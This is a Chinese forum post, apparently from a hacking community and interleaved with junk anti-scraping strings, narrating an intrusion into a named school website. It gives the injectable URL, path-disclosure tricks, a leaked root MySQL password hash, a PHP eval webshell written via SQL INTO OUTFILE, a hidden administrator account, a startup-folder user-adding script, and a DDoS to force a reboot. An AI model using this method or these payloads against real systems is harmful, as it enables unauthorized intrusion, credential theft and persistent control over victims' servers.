友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！
+ r% `+ _0 l; G: J, ^( s
6 W6 I7 t1 i) ?
0 N8 L3 c1 |- R% L. V- W* {# v5 L6 L! h0 E
常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限

6 A7 b$ I- O  X% ]$ E+ a那么想可以直接写入shell ，getshell有几个条件：
3 ?" b6 f7 A) a+ R

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF
2 Z: Z6 z6 |- h) C% C1 q0 N
试着爆绝对路径：
1./phpMyAdmin/index.php?lang[]=1  
& t! ]" E  y4 z; C( t, G2 [3 L2./phpMyAdmin/phpinfo.php  
3./load_file()  
' N  f0 H2 V& G* x$ v: E- ~4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
5./phpmyadmin/libraries/select_lang.lib.php  
8 V6 N; f: B% B6 O8 ~$ j2 W3 s0 E6./phpmyadmin/libraries/lect_lang.lib.php  
% p& T6 \* W; y/ O$ V9 u7 G+ A& |# F7./phpmyadmin/libraries/mcrypt.lib.php   
2 c& D: ~5 d7 `9 v4 f' ?' e8./phpmyadmin/libraries/export/xls.php  

2 P' R5 V+ s& B9 ?2 F( }均不行...........................

+ i; k9 ]" _$ G# m( d: k御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php

0 V' k6 R" U) ]6 a& s权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin

/ G1 s: E: x' V/ z5 F& N默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败

敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........
8 a! L7 }4 ~3 W( K* c; W0 u2 t
& r3 n. P1 `& E% `2 S+ W想想root还可以读，读到root密码进phpmyadmin 也可以拿shell
* j2 N" j( _3 O% u: c' i
; I! k' O6 a! s# Shttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini

9 U0 l* Y; G, s- Q自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD
+ _( [, u4 G4 ^. A% P
成功读到root密码：

# a, \2 X; [0 B6 R1 n17---- r(0072)
: k( o6 ]( a* l; h/ y) T" O18---- o(006f)
19---- o(006f)
20---- t(0074)
21---- *(002a)
+ }2 Y; p. O6 ~, ~/ x& Z1 d7 y22---- 8(0038)
23---- 2(0032)
" z$ d0 f5 M% s8 M- x+ ~( M24---- E(0045)
25---- 1(0031)
26---- C(0043)
) m+ w" [  _9 d0 `1 |27---- 5(0035)
28---- 8(0038)
" J1 A8 h* d1 [, {* j+ V1 Z2 S29---- 2(0032)
30---- 8(0038)
0 S+ c* A% ]1 r9 r31---- A(0041)
2 E: U* R4 X* J: A+ R32---- 9(0039)
0 K4 j% m1 s) A33---- B(0042)
34---- 5(0035)
( Z! k  [" Z! n6 M6 s9 ^" P35---- 4(0034)
36---- 8(0038)
37---- 6(0036)
3 z( r* I/ X$ c5 l38---- 4(0034)
39---- 9(0039)
/ \8 f  H$ Y# T  l0 E40---- 1(0031)
41---- 1(0031)
42---- 5(0035)
43---- 3(0033)
# ^" w. _8 u, I, v  H" K' }44---- 5(0035)
% p+ |9 p* B* P+ W6 K3 c+ v& b45---- 9(0039)
46---- 8(0038)
47---- F(0046)
+ W2 A' i, \4 i  j& T5 d, o48---- F(0046)
+ H+ {' E+ W, T! T/ u# ~49---- 4(0034)
$ s, s7 f# f7 f  L8 l50---- F(0046)
51---- 0(0030)
52---- 3(0033)
8 h: {: A" l' N+ T53---- 2(0032)
54---- A(0041)
5 R% j. \! _/ ^$ j1 d$ Z% s+ i' u55---- 4(0034)
9 c. h& C$ @6 I6 t% d4 V7 c. I# e56---- A(0041)
1 _; G- k8 y0 h  F3 I57---- B(0042)
9 e4 d! e+ P5 i# ~: u0 f58---- *(0044)
59---- *(0035)
) G  M& j& ^3 M5 ~5 C6 D60---- *(0041)
5 Q& a2 i3 C) V( s* E0 l$ F' h' N61---- *0032)

8 r) Y7 q& [# q( ^  x8 |! N解密后成功登陆phpmyamin
                          

                             
* ?0 d9 |8 S) H: o
找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'

3 ^) l# n" i' B/ M' A成功执行，拿下shell，菜刀连接：
0 d7 G$ @, @. F
服务器不支持asp,aspx,php提权无果...................
+ ~4 q2 a" {6 D+ D( R
% l- F' ]. ?( I; o! l- x: ~但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：
) N1 p5 ]8 J- {

服务器上已经有个隐藏帐号了

$ G- w8 f5 U( A6 O* y+ t

别名     administrators
! \$ x4 n  O$ I3 ^4 D注释     管理员对计算机/域有不受限制的完全访问权

% q6 i5 [  J8 m3 |

成员

-------------------------------------------------------------------------------
admin
- c1 E6 X; w. `# J- s5 UAdministrator
7 I3 U5 k7 E4 L; s3 Aslipper$
sqluser
命令成功完成。
; O. c% D7 ]& A5 G
服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。
' ~+ ]6 P% K5 M
  X* T% M, n$ x6 gddos服务器重启，不然就只能坐等服务器重启了...............................
" d# j8 {0 ~, j+ n( V; R/ b7 W2 g
% |8 |; h7 Y% `  h8 J$ h" ~      

angel